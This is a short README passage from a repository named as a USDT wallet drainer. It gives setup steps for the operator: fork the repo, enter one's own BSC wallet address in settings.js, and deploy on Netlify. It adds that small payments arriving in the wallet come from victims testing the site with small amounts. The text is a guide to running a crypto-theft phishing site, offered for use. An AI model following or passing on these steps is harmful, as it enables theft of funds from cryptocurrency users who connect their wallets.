r72342324/usdt-wallet-drainer/README.md

 4. Add your wallet to settings.js file use bsc address and make sure its on your forked one

+ Fork ---------->  add your bsc wallet to settings.js file  ------> Go to  https://www.netlify.com/ and deploy

 If you notice small payments made to you thats because most people test the site with small amounts